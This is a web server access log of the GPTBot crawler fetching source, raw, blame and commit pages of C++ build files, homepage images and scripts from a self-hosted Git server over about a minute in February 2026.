"/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10202] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10433] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10433] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17042] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17039] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11013] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17080] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10225] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11898] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11902] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:15:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17965] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17967] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70934] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:15:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:15:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10960] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:15:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:15:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 10889] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:15:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:15:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 10896] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:15:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10874] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images" +[17/Feb/2026:15:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 14903] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" +[17/Feb/2026:15:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11327] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11394] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18405] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 8206055] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:15:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:15:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 4568382] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 